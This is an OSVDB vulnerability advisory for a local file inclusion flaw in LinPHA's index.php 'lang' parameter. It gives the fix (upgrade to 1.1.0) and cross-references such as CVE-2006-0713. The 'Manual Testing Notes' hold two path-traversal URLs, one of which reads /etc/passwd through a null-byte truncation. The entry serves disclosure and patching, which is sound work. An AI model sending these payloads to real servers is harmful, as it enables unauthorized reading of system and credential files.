LinPHA index.php lang Variable Local File Inclusion

ID OSVDB:23112
Type osvdb
Reporter OSVDB
Modified 2006-02-11T08:02:40


Technical Description

This ability to include non PHP files is only present when the magic_quotes_gpc PHP option is 'off'.

Solution Description

Upgrade to version 1.1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[host]/docs/index.php?lang=/../../../../../../../../arbitrary.php http://[target]/[host]/docs/index.php?lang=/../../../../../../../../etc/passwd%00


Vendor URL: Vendor Specific News/Changelog Entry: Secunia Advisory ID:18808 Related OSVDB ID: 23113 Related OSVDB ID: 23115 Related OSVDB ID: 23114 Related OSVDB ID: 23116 Other Advisory URL: Mail List Post: FrSIRT Advisory: ADV-2006-0535 CVE-2006-0713 Bugtraq ID: 16592